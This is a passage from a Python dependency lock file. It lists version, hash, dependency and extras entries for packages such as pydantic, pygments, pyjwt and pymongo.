"sha256:0f516fd69aa61a9698a3ce3ba2f7edda5ac6aafc8d964ee3bc60897906947fcb"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e36f018303656ea4a629d2fba0d0d4c74960eacec7119fe2ab3c658ce84c494b"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:dd3c4b312a931e668a7a291d4bd5b10bacb0687bd163220a9f0418c7e23169e2"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-win32.whl", hash = "sha256:cfea42972e90954b3c89da9216993373a2270a5103d4916fd543a1109528ed4c"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-win_amd64.whl", hash = 
"sha256:85ca06f382f999903d809380e4c01ec127d3eb26431402e9b3f01facaec68b80"}, {file = "pyclipper-1.3.0.post5-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:da30e59c684eea198f6e19244e9a41e855a23a416cc708821fd4eb8f5f18626c"}, {file = "pyclipper-1.3.0.post5-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d8a9e3e46aa50e4c3667db9a816d59ae4f9c62b05f997abb8a9b3f3afe6d94a4"}, {file = "pyclipper-1.3.0.post5-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0589b80f2da1ad322345a93c053b5d46dc692def5a188351be01f34bcf041218"}, {file = "pyclipper-1.3.0.post5.tar.gz", hash = "sha256:c0239f928e0bf78a3efc2f2f615a10bfcdb9f33012d46d64c8d1225b4bde7096"}, ] [[package]] name = "pycparser" version = "2.21" description = "C parser in Python" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "pycparser-2.21-py2.py3-none-any.whl", hash = "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9"}, {file = "pycparser-2.21.tar.gz", hash = "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"}, ] [[package]] name = "pydantic" version = "1.10.13" description = "Data validation and settings management using python type hints" optional = false python-versions = ">=3.7" files = [ {file = "pydantic-1.10.13-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:efff03cc7a4f29d9009d1c96ceb1e7a70a65cfe86e89d34e4a5f2ab1e5693737"}, {file = "pydantic-1.10.13-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3ecea2b9d80e5333303eeb77e180b90e95eea8f765d08c3d278cd56b00345d01"}, {file = "pydantic-1.10.13-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1740068fd8e2ef6eb27a20e5651df000978edce6da6803c2bef0bc74540f9548"}, {file = "pydantic-1.10.13-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84bafe2e60b5e78bc64a2941b4c071a4b7404c5c907f5f5a99b0139781e69ed8"}, {file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:bc0898c12f8e9c97f6cd44c0ed70d55749eaf783716896960b4ecce2edfd2d69"}, {file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:654db58ae399fe6434e55325a2c3e959836bd17a6f6a0b6ca8107ea0571d2e17"}, {file = "pydantic-1.10.13-cp310-cp310-win_amd64.whl", hash = "sha256:75ac15385a3534d887a99c713aa3da88a30fbd6204a5cd0dc4dab3d770b9bd2f"}, {file = "pydantic-1.10.13-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c553f6a156deb868ba38a23cf0df886c63492e9257f60a79c0fd8e7173537653"}, {file = "pydantic-1.10.13-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:5e08865bc6464df8c7d61439ef4439829e3ab62ab1669cddea8dd00cd74b9ffe"}, {file = "pydantic-1.10.13-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e31647d85a2013d926ce60b84f9dd5300d44535a9941fe825dc349ae1f760df9"}, {file = "pydantic-1.10.13-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:210ce042e8f6f7c01168b2d84d4c9eb2b009fe7bf572c2266e235edf14bacd80"}, {file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:8ae5dd6b721459bfa30805f4c25880e0dd78fc5b5879f9f7a692196ddcb5a580"}, {file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f8e81fc5fb17dae698f52bdd1c4f18b6ca674d7068242b2aff075f588301bbb0"}, {file = "pydantic-1.10.13-cp311-cp311-win_amd64.whl", hash = "sha256:61d9dce220447fb74f45e73d7ff3b530e25db30192ad8d425166d43c5deb6df0"}, {file = 
"pydantic-1.10.13-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4b03e42ec20286f052490423682016fd80fda830d8e4119f8ab13ec7464c0132"}, {file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f59ef915cac80275245824e9d771ee939133be38215555e9dc90c6cb148aaeb5"}, {file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5a1f9f747851338933942db7af7b6ee8268568ef2ed86c4185c6ef4402e80ba8"}, {file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:97cce3ae7341f7620a0ba5ef6cf043975cd9d2b81f3aa5f4ea37928269bc1b87"}, {file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:854223752ba81e3abf663d685f105c64150873cc6f5d0c01d3e3220bcff7d36f"}, {file = "pydantic-1.10.13-cp37-cp37m-win_amd64.whl", hash = "sha256:b97c1fac8c49be29486df85968682b0afa77e1b809aff74b83081cc115e52f33"}, {file = "pydantic-1.10.13-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c958d053453a1c4b1c2062b05cd42d9d5c8eb67537b8d5a7e3c3032943ecd261"}, {file = "pydantic-1.10.13-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4c5370a7edaac06daee3af1c8b1192e305bc102abcbf2a92374b5bc793818599"}, {file = "pydantic-1.10.13-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d6f6e7305244bddb4414ba7094ce910560c907bdfa3501e9db1a7fd7eaea127"}, {file = "pydantic-1.10.13-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d3a3c792a58e1622667a2837512099eac62490cdfd63bd407993aaf200a4cf1f"}, {file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:c636925f38b8db208e09d344c7aa4f29a86bb9947495dd6b6d376ad10334fb78"}, {file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:678bcf5591b63cc917100dc50ab6caebe597ac67e8c9ccb75e698f66038ea953"}, {file = "pydantic-1.10.13-cp38-cp38-win_amd64.whl", hash = "sha256:6cf25c1a65c27923a17b3da28a0bdb99f62ee04230c931d83e888012851f4e7f"}, {file = "pydantic-1.10.13-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8ef467901d7a41fa0ca6db9ae3ec0021e3f657ce2c208e98cd511f3161c762c6"}, {file = "pydantic-1.10.13-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:968ac42970f57b8344ee08837b62f6ee6f53c33f603547a55571c954a4225691"}, {file = "pydantic-1.10.13-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9849f031cf8a2f0a928fe885e5a04b08006d6d41876b8bbd2fc68a18f9f2e3fd"}, {file = "pydantic-1.10.13-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:56e3ff861c3b9c6857579de282ce8baabf443f42ffba355bf070770ed63e11e1"}, {file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f00790179497767aae6bcdc36355792c79e7bbb20b145ff449700eb076c5f96"}, {file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:75b297827b59bc229cac1a23a2f7a4ac0031068e5be0ce385be1462e7e17a35d"}, {file = "pydantic-1.10.13-cp39-cp39-win_amd64.whl", hash = "sha256:e70ca129d2053fb8b728ee7d1af8e553a928d7e301a311094b8a0501adc8763d"}, {file = "pydantic-1.10.13-py3-none-any.whl", hash = "sha256:b87326822e71bd5f313e7d3bfdc77ac3247035ac10b0c0618bd99dcf95b1e687"}, {file = "pydantic-1.10.13.tar.gz", hash = "sha256:32c8b48dcd3b2ac4e78b0ba4af3a2c2eb6048cb75202f0ea7b34feb740efc340"}, ] [package.dependencies] typing-extensions = ">=4.2.0" [package.extras] dotenv = ["python-dotenv (>=0.10.4)"] email = ["email-validator (>=1.0.3)"] [[package]] name = "pydeck" version = "0.8.0" description = "Widget 
for deck.gl maps" optional = true python-versions = ">=3.7" files = [ {file = "pydeck-0.8.0-py2.py3-none-any.whl", hash = "sha256:a8fa7757c6f24bba033af39db3147cb020eef44012ba7e60d954de187f9ed4d5"}, {file = "pydeck-0.8.0.tar.gz", hash = "sha256:07edde833f7cfcef6749124351195aa7dcd24663d4909fd7898dbd0b6fbc01ec"}, ] [package.dependencies] jinja2 = ">=2.10.1" numpy = ">=1.16.4" [package.extras] carto = ["pydeck-carto"] jupyter = ["ipykernel (>=5.1.2)", "ipython (>=5.8.0)", "ipywidgets (>=7,<8)", "traitlets (>=4.3.2)"] [[package]] name = "pyee" version = "11.0.1" description = "A rough port of Node.js's EventEmitter to Python with a few tricks of its own" optional = false python-versions = ">=3.8" files = [ {file = "pyee-11.0.1-py3-none-any.whl", hash = "sha256:9bcc9647822234f42c228d88de63d0f9ffa881e87a87f9d36ddf5211f6ac977d"}, {file = "pyee-11.0.1.tar.gz", hash = "sha256:a642c51e3885a33ead087286e35212783a4e9b8d6514a10a5db4e57ac57b2b29"}, ] [package.dependencies] typing-extensions = "*" [package.extras] dev = ["black", "flake8", "flake8-black", "isort", "jupyter-console", "mkdocs", "mkdocs-include-markdown-plugin", "mkdocstrings[python]", "pytest", "pytest-asyncio", "pytest-trio", "toml", "tox", "trio", "trio", "trio-typing", "twine", "twisted", "validate-pyproject[all]"] [[package]] name = "pygments" version = "2.16.1" description = "Pygments is a syntax highlighting package written in Python." optional = false python-versions = ">=3.7" files = [ {file = "Pygments-2.16.1-py3-none-any.whl", hash = "sha256:13fc09fa63bc8d8671a6d247e1eb303c4b343eaee81d861f3404db2935653692"}, {file = "Pygments-2.16.1.tar.gz", hash = "sha256:1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29"}, ] [package.extras] plugins = ["importlib-metadata"] [[package]] name = "pyjwt" version = "2.8.0" description = "JSON Web Token implementation in Python" optional = true python-versions = ">=3.7" files = [ {file = "PyJWT-2.8.0-py3-none-any.whl", hash = "sha256:59127c392cc44c2da5bb3192169a91f429924e17aff6534d70fdc02ab3e04320"}, {file = "PyJWT-2.8.0.tar.gz", hash = "sha256:57e28d156e3d5c10088e0c68abb90bfac3df82b40a71bd0daa20c65ccd5c23de"}, ] [package.dependencies] cryptography = {version = ">=3.4.0", optional = true, markers = "extra == \"crypto\""} [package.extras] crypto = ["cryptography (>=3.4.0)"] dev = ["coverage[toml] (==5.0.4)", "cryptography (>=3.4.0)", "pre-commit", "pytest (>=6.0.0,<7.0.0)", "sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"] docs = ["sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"] tests = ["coverage[toml] (==5.0.4)", "pytest (>=6.0.0,<7.0.0)"] [[package]] name = "pylance" version = "0.5.10" description = "python wrapper for lance-rs" optional = true python-versions = ">=3.8" files = [ {file = "pylance-0.5.10-cp38-abi3-macosx_10_15_x86_64.whl", hash = "sha256:ca5b649fe3adfacaec7680c708fc3a952f6d8b43fd193afdfc5f3e8e13c47b82"}, {file = "pylance-0.5.10-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:a5b47ca4cf91709f0f7cd9f9604c6c9c6efc031f38035c27a7d0a21d9b83f507"}, {file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ffa28a110345a6ce191285171b70a13696aa92cb4c1d6318d5444df65ab8025"}, {file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0244faa5b039d6bb0e00d8f27222542c0e86bbf9128b6d8db9e5072ec0ea19"}, {file = "pylance-0.5.10-cp38-abi3-win_amd64.whl", hash = "sha256:92727d6a8f383f16a8e5503d41e2212881fe829b493f6f6aec202c2c7dce7d65"}, ] [package.dependencies] numpy = 
">=1.22" pyarrow = ">=10" [package.extras] tests = ["duckdb", "ml_dtypes", "pandas (>=1.4)", "polars[pandas,pyarrow]", "pytest", "tensorflow"] [[package]] name = "pymongo" version = "4.5.0" description = "Python driver for MongoDB <http://www.mongodb.org>" optional = true python-versions = ">=3.7" files = [ {file = "pymongo-4.5.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:2d4fa1b01fa7e5b7bb8d312e3542e211b320eb7a4e3d8dc884327039d93cb9e0"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux1_i686.whl", hash = "sha256:dfcd2b9f510411de615ccedd47462dae80e82fdc09fe9ab0f0f32f11cf57eeb5"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:3e33064f1984db412b34d51496f4ea785a9cff621c67de58e09fb28da6468a52"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_i686.whl", hash = "sha256:33faa786cc907de63f745f587e9879429b46033d7d97a7b84b37f4f8f47b9b32"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_ppc64le.whl", hash = "sha256:76a262c41c1a7cbb84a3b11976578a7eb8e788c4b7bfbd15c005fb6ca88e6e50"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_s390x.whl", hash = "sha256:0f4b125b46fe377984fbaecf2af40ed48b05a4b7676a2ff98999f2016d66b3ec"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:40d5f6e853ece9bfc01e9129b228df446f49316a4252bb1fbfae5c3c9dedebad"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:152259f0f1a60f560323aacf463a3642a65a25557683f49cfa08c8f1ecb2395a"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6d64878d1659d2a5bdfd0f0a4d79bafe68653c573681495e424ab40d7b6d6d41"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1bb3a62395ffe835dbef3a1cbff48fbcce709c78bd1f52e896aee990928432b"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe48f50fb6348511a3268a893bfd4ab5f263f5ac220782449d03cd05964d1ae7"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7591a3beea6a9a4fa3080d27d193b41f631130e3ffa76b88c9ccea123f26dc59"}, {file = "pymongo-4.5.0-cp310-cp310-win32.whl", hash = "sha256:3a7166d57dc74d679caa7743b8ecf7dc3a1235a9fd178654dddb2b2a627ae229"}, {file = "pymongo-4.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:21b953da14549ff62ea4ae20889c71564328958cbdf880c64a92a48dda4c9c53"}, {file = "pymongo-4.5.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ead4f19d0257a756b21ac2e0e85a37a7245ddec36d3b6008d5bfe416525967dc"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9aff6279e405dc953eeb540ab061e72c03cf38119613fce183a8e94f31be608f"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:cd4c8d6aa91d3e35016847cbe8d73106e3d1c9a4e6578d38e2c346bfe8edb3ca"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:08819da7864f9b8d4a95729b2bea5fffed08b63d3b9c15b4fea47de655766cf5"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a253b765b7cbc4209f1d8ee16c7287c4268d3243070bf72d7eec5aa9dfe2a2c2"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8027c9063579083746147cf401a7072a9fb6829678076cd3deff28bb0e0f50c8"}, {file = "pymongo-4.5.0-cp311-cp311-win32.whl", hash = 
"sha256:9d2346b00af524757576cc2406414562cced1d4349c92166a0ee377a2a483a80"}, {file = "pymongo-4.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:c3c3525ea8658ee1192cdddf5faf99b07ebe1eeaa61bf32821126df6d1b8072b"}, {file = "pymongo-4.5.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:e5a27f348909235a106a3903fc8e70f573d89b41d723a500869c6569a391cff7"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9a9a39b7cac81dca79fca8c2a6479ef4c7b1aab95fad7544cc0e8fd943595a2"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:496c9cbcb4951183d4503a9d7d2c1e3694aab1304262f831d5e1917e60386036"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:23cc6d7eb009c688d70da186b8f362d61d5dd1a2c14a45b890bd1e91e9c451f2"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fff7d17d30b2cd45afd654b3fc117755c5d84506ed25fda386494e4e0a3416e1"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6422b6763b016f2ef2beedded0e546d6aa6ba87910f9244d86e0ac7690f75c96"}, {file = "pymongo-4.5.0-cp312-cp312-win32.whl", hash = "sha256:77cfff95c1fafd09e940b3fdcb7b65f11442662fad611d0e69b4dd5d17a81c60"}, {file = "pymongo-4.5.0-cp312-cp312-win_amd64.whl", hash = "sha256:e57d859b972c75ee44ea2ef4758f12821243e99de814030f69a3decb2aa86807"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:2b0176f9233a5927084c79ff80b51bd70bfd57e4f3d564f50f80238e797f0c8a"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89b3f2da57a27913d15d2a07d58482f33d0a5b28abd20b8e643ab4d625e36257"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:5caee7bd08c3d36ec54617832b44985bd70c4cbd77c5b313de6f7fce0bb34f93"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_i686.whl", hash = "sha256:1d40ad09d9f5e719bc6f729cc6b17f31c0b055029719406bd31dde2f72fca7e7"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_ppc64le.whl", hash = "sha256:076afa0a4a96ca9f77fec0e4a0d241200b3b3a1766f8d7be9a905ecf59a7416b"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_s390x.whl", hash = "sha256:3fa3648e4f1e63ddfe53563ee111079ea3ab35c3b09cd25bc22dadc8269a495f"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:44ee985194c426ddf781fa784f31ffa29cb59657b2dba09250a4245431847d73"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b33c17d9e694b66d7e96977e9e56df19d662031483efe121a24772a44ccbbc7e"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3d79ae3bb1ff041c0db56f138c88ce1dfb0209f3546d8d6e7c3f74944ecd2439"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d67225f05f6ea27c8dc57f3fa6397c96d09c42af69d46629f71e82e66d33fa4f"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:41771b22dd2822540f79a877c391283d4e6368125999a5ec8beee1ce566f3f82"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a1f26bc1f5ce774d99725773901820dfdfd24e875028da4a0252a5b48dcab5c"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3236cf89d69679eaeb9119c840f5c7eb388a2110b57af6bb6baf01a1da387c18"}, {file = 
"pymongo-4.5.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:e1f61355c821e870fb4c17cdb318669cfbcf245a291ce5053b41140870c3e5cc"}, {file = "pymongo-4.5.0-cp37-cp37m-win32.whl", hash = "sha256:49dce6957598975d8b8d506329d2a3a6c4aee911fa4bbcf5e52ffc6897122950"}, {file = "pymongo-4.5.0-cp37-cp37m-win_amd64.whl", hash = "sha256:f2227a08b091bd41df5aadee0a5037673f691e2aa000e1968b1ea2342afc6880"}, {file = "pymongo-4.5.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:435228d3c16a375274ac8ab9c4f9aef40c5e57ddb8296e20ecec9e2461da1017"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux1_i686.whl", hash = "sha256:8e559116e4128630ad3b7e788e2e5da81cbc2344dee246af44471fa650486a70"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:840eaf30ccac122df260b6005f9dfae4ac287c498ee91e3e90c56781614ca238"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:b4fe46b58010115514b842c669a0ed9b6a342017b15905653a5b1724ab80917f"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_i686.whl", hash = "sha256:a8127437ebc196a6f5e8fddd746bd0903a400dc6b5ae35df672dd1ccc7170a2a"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_ppc64le.whl", hash = "sha256:2988ef5e6b360b3ff1c6d55c53515499de5f48df31afd9f785d788cdacfbe2d3"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_s390x.whl", hash = "sha256:e249190b018d63c901678053b4a43e797ca78b93fb6d17633e3567d4b3ec6107"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:1240edc1a448d4ada4bf1a0e55550b6292420915292408e59159fd8bbdaf8f63"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6d2a56fc2354bb6378f3634402eec788a8f3facf0b3e7d468db5f2b5a78d763"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2a0aade2b11dc0c326ccd429ee4134d2d47459ff68d449c6d7e01e74651bd255"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:74c0da07c04d0781490b2915e7514b1adb265ef22af039a947988c331ee7455b"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f3754acbd7efc7f1b529039fcffc092a15e1cf045e31f22f6c9c5950c613ec4d"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:631492573a1bef2f74f9ac0f9d84e0ce422c251644cd81207530af4aa2ee1980"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e2654d1278384cff75952682d17c718ecc1ad1d6227bb0068fd826ba47d426a5"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:168172ef7856e20ec024fe2a746bfa895c88b32720138e6438fd765ebd2b62dd"}, {file = "pymongo-4.5.0-cp38-cp38-win32.whl", hash = "sha256:b25f7bea162b3dbec6d33c522097ef81df7c19a9300722fa6853f5b495aecb77"}, {file = "pymongo-4.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:b520aafc6cb148bac09ccf532f52cbd31d83acf4d3e5070d84efe3c019a1adbf"}, {file = "pymongo-4.5.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8543253adfaa0b802bfa88386db1009c6ebb7d5684d093ee4edc725007553d21"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux1_i686.whl", hash = "sha256:bc5d8c3647b8ae28e4312f1492b8f29deebd31479cd3abaa989090fb1d66db83"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:505f8519c4c782a61d94a17b0da50be639ec462128fbd10ab0a34889218fdee3"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_aarch64.whl", hash = 
"sha256:53f2dda54d76a98b43a410498bd12f6034b2a14b6844ca08513733b2b20b7ad8"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_i686.whl", hash = "sha256:9c04b9560872fa9a91251030c488e0a73bce9321a70f991f830c72b3f8115d0d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_ppc64le.whl", hash = "sha256:58a63a26a1e3dc481dd3a18d6d9f8bd1d576cd1ffe0d479ba7dd38b0aeb20066"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_s390x.whl", hash = "sha256:f076b779aa3dc179aa3ed861be063a313ed4e48ae9f6a8370a9b1295d4502111"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:1b1d7d9aabd8629a31d63cd106d56cca0e6420f38e50563278b520f385c0d86e"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:37df8f6006286a5896d1cbc3efb8471ced42e3568d38e6cb00857277047b0d63"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:56320c401f544d762fc35766936178fbceb1d9261cd7b24fbfbc8fb6f67aa8a5"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:bbd705d5f3c3d1ff2d169e418bb789ff07ab3c70d567cc6ba6b72b04b9143481"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80a167081c75cf66b32f30e2f1eaee9365af935a86dbd76788169911bed9b5d5"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c42748ccc451dfcd9cef6c5447a7ab727351fd9747ad431db5ebb18a9b78a4d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:cf62da7a4cdec9a4b2981fcbd5e08053edffccf20e845c0b6ec1e77eb7fab61d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b5bbb87fa0511bd313d9a2c90294c88db837667c2bda2ea3fa7a35b59fd93b1f"}, {file = "pymongo-4.5.0-cp39-cp39-win32.whl", hash = "sha256:465fd5b040206f8bce7016b01d7e7f79d2fcd7c2b8e41791be9632a9df1b4999"}, {file = "pymongo-4.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:63d8019eee119df308a075b8a7bdb06d4720bf791e2b73d5ab0e7473c115d79c"}, {file = "pymongo-4.5.0.tar.gz", hash = "sha256:681f252e43b3ef054ca9161635f81b730f4d8cadd28b3f2b2004f5a72f853982"}, ] [package.dependencies] dnspython = ">=1.16.0,<3.0.0" [package.extras] aws = ["pymongo-auth-aws (<2.0.0)"] encryption = ["certifi", "pymongo[aws]", "pymongocrypt (>=1.6.0,<2.0.0)"] gssapi = ["pykerberos", "winkerberos (>=0.5.0)"] ocsp = ["certifi", "cryptography (>=2.5)", "pyopenssl (>=17.2.0)", "requests (<3.0.0)", "service-identity (>=18.1.0)"] snappy = ["python-snappy"] zstd = ["zstandard"] [[package]] name = "pympler" version = "1.0.1" description = "A development tool to measure, monitor and analyze the memory behavior of Python objects." optional = true 